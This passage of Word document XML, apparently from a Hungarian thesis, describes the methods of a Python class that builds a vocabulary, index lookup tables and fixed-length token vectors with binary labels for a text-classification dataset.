        <w:t xml:space="preserve">hogy </w:t>
      </w:r>
      <w:r w:rsidR="00010091">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">hány </w:t>
      </w:r>
      <w:r w:rsidR="00750592">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="00010091">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> van </w:t>
      </w:r>
      <w:r w:rsidR="00EB3837">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ténylegesen</w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>max_length</w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00EB3837">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D900C0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> A paraméterek változókba helyezésén kívül még inicializál</w:t>
      </w:r>
      <w:r w:rsidR="00F811EF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>va van egy számláló (</w:t>
      </w:r>
      <w:r w:rsidR="00F811EF" w:rsidRPr="00F811EF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>word_freqs</w:t>
      </w:r>
      <w:r w:rsidR="00F811EF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>), két szótár (</w:t>
      </w:r>
      <w:r w:rsidR="00F811EF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>word2index, indextoword</w:t>
      </w:r>
      <w:r w:rsidR="00F811EF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00591EF5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, egy </w:t>
      </w:r>
      <w:r w:rsidR="00077FBD" w:rsidRPr="002D69C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>mátrix</w:t>
      </w:r>
      <w:r w:rsidR="00DA1A78" w:rsidRPr="002D69C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA1A78">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00DA1A78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>dataset</w:t>
      </w:r>
      <w:r w:rsidR="00DA1A78">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>) és a kimeneti vektoroknak egy-egy változó (</w:t>
      </w:r>
      <w:r w:rsidR="00DA1A78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>X, y</w:t>
      </w:r>
      <w:r w:rsidR="00DA1A78">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECF2C7" w14:textId="4902622E" w:rsidR="00C00756" w:rsidRPr="007459EA" w:rsidRDefault="008B6452" w:rsidP="007A6A3A">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">collectVocab: </w:t>
      </w:r>
      <w:r w:rsidR="00F24BE3" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00EA0D71" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">etódus, ami </w:t>
      </w:r>
      <w:r w:rsidR="000231BA" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ciklussal bejárja </w:t>
      </w:r>
      <w:r w:rsidR="003E5046">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="001E2A09" w:rsidRPr="007459EA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">dataset </w:t>
      </w:r>
      <w:r w:rsidR="00E070EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="003E5046">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">.oszlopának </w:t>
      </w:r>
      <w:r w:rsidR="00D90B28" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sorait</w:t>
      </w:r>
      <w:r w:rsidR="000231BA" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, szóköz alapján szétválasztja </w:t>
      </w:r>
      <w:r w:rsidR="007B445C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a token</w:t>
      </w:r>
      <w:r w:rsidR="00773B8C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B445C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sorozato</w:t>
      </w:r>
      <w:r w:rsidR="000A1EF1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kat</w:t>
      </w:r>
      <w:r w:rsidR="000231BA" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00032236" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">és </w:t>
      </w:r>
      <w:r w:rsidR="00707D03" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">az egyes tokeneket az </w:t>
      </w:r>
      <w:r w:rsidR="00A04AB8" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>előfordulási szám</w:t>
      </w:r>
      <w:r w:rsidR="00707D03" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ukkal a </w:t>
      </w:r>
      <w:r w:rsidR="00707D03" w:rsidRPr="007459EA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>word_freqs</w:t>
      </w:r>
      <w:r w:rsidR="00707D03" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> változóba teszi</w:t>
      </w:r>
      <w:r w:rsidR="00F82241" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CB5817" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A collection.Counter típusából adódóan biztosítja </w:t>
      </w:r>
      <w:r w:rsidR="00970605" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">változón belül a </w:t>
      </w:r>
      <w:r w:rsidR="00CB5817" w:rsidRPr="007459EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>csökkenő sorrendet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CE84F" w14:textId="08AA3D5B" w:rsidR="009A2202" w:rsidRDefault="008A240F" w:rsidP="00A508F9">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">createLookupTables: </w:t>
      </w:r>
      <w:r w:rsidR="00844B06">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00F24BE3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>etódus</w:t>
      </w:r>
      <w:r w:rsidR="00CA6D41">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009A2202">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">amely </w:t>
      </w:r>
      <w:r w:rsidR="0047543D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">indexekkel </w:t>
      </w:r>
      <w:r w:rsidR="009A2202">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>keresőtáblá</w:t>
      </w:r>
      <w:r w:rsidR="00D90921">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kat</w:t>
      </w:r>
      <w:r w:rsidR="009A2202">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> készít a </w:t>
      </w:r>
      <w:r w:rsidR="009A2202" w:rsidRPr="00F811EF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>word_freqs</w:t>
      </w:r>
      <w:r w:rsidR="009A2202">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> tokenjeinek</w:t>
      </w:r>
      <w:r w:rsidR="007F6829">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, ezek a </w:t>
      </w:r>
      <w:r w:rsidR="007F6829">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>word2index</w:t>
      </w:r>
      <w:r w:rsidR="007F6829" w:rsidRPr="007F6829">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és az </w:t>
      </w:r>
      <w:r w:rsidR="007F6829">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidR="00280E53">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007F6829">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>word.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71E212" w14:textId="413DE767" w:rsidR="003B1788" w:rsidRPr="00234099" w:rsidRDefault="00B4246C" w:rsidP="00CB77FE">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">createVectors: </w:t>
      </w:r>
      <w:r w:rsidR="00AE047C" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Metódus, ami ciklussal végigmegy </w:t>
      </w:r>
      <w:r w:rsidR="00363FCF" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egyrészt </w:t>
      </w:r>
      <w:r w:rsidR="00AE047C" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E149B7" w:rsidRPr="00234099">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">dataset </w:t>
      </w:r>
      <w:r w:rsidR="009D7E3F" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D450E1" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">.oszlopának </w:t>
      </w:r>
      <w:r w:rsidR="00085843" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003A1A18" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="00085843" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">étdarabolt </w:t>
      </w:r>
      <w:r w:rsidR="00C349A1" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tokenjein</w:t>
      </w:r>
      <w:r w:rsidR="007F1616" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, és a </w:t>
      </w:r>
      <w:r w:rsidR="00547883" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">keresőtábla alapján a </w:t>
      </w:r>
      <w:r w:rsidR="007F1616" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hozzájuk tartozó</w:t>
      </w:r>
      <w:r w:rsidR="00547883" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F1616" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">indexet </w:t>
      </w:r>
      <w:r w:rsidR="003F6568" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">az </w:t>
      </w:r>
      <w:r w:rsidR="003F6568" w:rsidRPr="00234099">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">X </w:t>
      </w:r>
      <w:r w:rsidR="003F6568" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>változóba</w:t>
      </w:r>
      <w:r w:rsidR="007F1616" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F4762" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>listázza</w:t>
      </w:r>
      <w:r w:rsidR="0001733A" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003478D0" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Amennyiben </w:t>
      </w:r>
      <w:r w:rsidR="00096BCA" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">az </w:t>
      </w:r>
      <w:r w:rsidR="00096BCA" w:rsidRPr="00234099">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00096BCA" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> változó</w:t>
      </w:r>
      <w:r w:rsidR="003478D0" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> hossza kevesebb, mint a </w:t>
      </w:r>
      <w:r w:rsidR="003478D0" w:rsidRPr="00234099">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">max_length </w:t>
      </w:r>
      <w:r w:rsidR="003478D0" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">értéke, a különbséget nullákkal tölti fel. Ha a hossza nagyobb, a különbséget levágja a </w:t>
      </w:r>
      <w:r w:rsidR="00D8654D" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>lista</w:t>
      </w:r>
      <w:r w:rsidR="003478D0" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> végéről. </w:t>
      </w:r>
      <w:r w:rsidR="00CB77FE" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Így</w:t>
      </w:r>
      <w:r w:rsidR="00A22913" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a vektorok hossza </w:t>
      </w:r>
      <w:r w:rsidR="00A22913" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>egységes marad.</w:t>
      </w:r>
      <w:r w:rsidR="00AE4644" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B19A6" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Másrészt a </w:t>
      </w:r>
      <w:r w:rsidR="008B19A6" w:rsidRPr="00234099">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">dataset </w:t>
      </w:r>
      <w:r w:rsidR="00850CB1" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">utolsó </w:t>
      </w:r>
      <w:r w:rsidR="008B19A6" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>oszlopának bináris számai</w:t>
      </w:r>
      <w:r w:rsidR="00594349" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">t is kigyűjti, ezeket az </w:t>
      </w:r>
      <w:r w:rsidR="00594349" w:rsidRPr="00234099">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="008B19A6" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>változóba</w:t>
      </w:r>
      <w:r w:rsidR="00594349" w:rsidRPr="00234099">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C5F56E" w14:textId="575FC495" w:rsidR="009A3FF8" w:rsidRDefault="009A3FF8" w:rsidP="009A3FF8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10056591" w14:textId="41B8C4D3" w:rsidR="009A3FF8" w:rsidRDefault="006931CF" w:rsidP="00520418">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1134"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006931CF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D9F5D49" wp14:editId="1BAC2234">
            <wp:extent cx="3553132" cy="1866900"/>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0234" cy="1870631"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="009E6B59" w14:textId="5C8D0A87" w:rsidR="009A3FF8" w:rsidRPr="006C73DB" w:rsidRDefault="009A3FF8" w:rsidP="00857EFF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="001B3B5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="002E2997">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">s ábra: </w:t>
      </w:r>
      <w:r w:rsidR="006C73DB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="0075597F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidR="006C73DB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">X[40] </w:t>
      </w:r>
      <w:r w:rsidR="006C73DB" w:rsidRPr="006C73DB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és a</w:t>
      </w:r>
      <w:r w:rsidR="0075597F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidR="006C73DB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>y[40</w:t>
      </w:r>
      <w:r w:rsidR="0075597F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="006C73DB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C73DB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>eredménye</w:t>
      </w:r>
      <w:r w:rsidR="00900D61">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="006C73DB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az </w:t>
      </w:r>
      <w:r w:rsidR="006C73DB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">X </w:t>
      </w:r>
      <w:r w:rsidR="00755E2D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">és </w:t>
      </w:r>
      <w:r w:rsidR="00755E2D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="00755E2D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>40.eleme</w:t>
      </w:r>
      <w:r w:rsidR="006C73DB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00755E2D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00BA59D5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="00857EFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00755E2D" w:rsidRPr="00AF537A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>concatenated</w:t>
      </w:r>
      <w:r w:rsidR="009A7519" w:rsidRPr="00AF537A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>_titled</w:t>
      </w:r>
      <w:r w:rsidR="00755E2D" w:rsidRPr="00AF537A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.csv 40.sorának</w:t>
      </w:r>
      <w:r w:rsidR="00755E2D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> felel meg, ami ekvivalens a 3.3-as ábrával</w:t>
      </w:r>
      <w:r w:rsidR="00053C30">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> felcímkézés után</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C73E2" w14:textId="77777777" w:rsidR="009A3FF8" w:rsidRPr="009A3FF8" w:rsidRDefault="009A3FF8" w:rsidP="009A3FF8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC25BB8" w14:textId="24934A83" w:rsidR="003F6568" w:rsidRDefault="003F6568" w:rsidP="006644E4">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">saveVectorAs: </w:t>
      </w:r>
      <w:r w:rsidR="002447D4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Metódus, ami az </w:t>
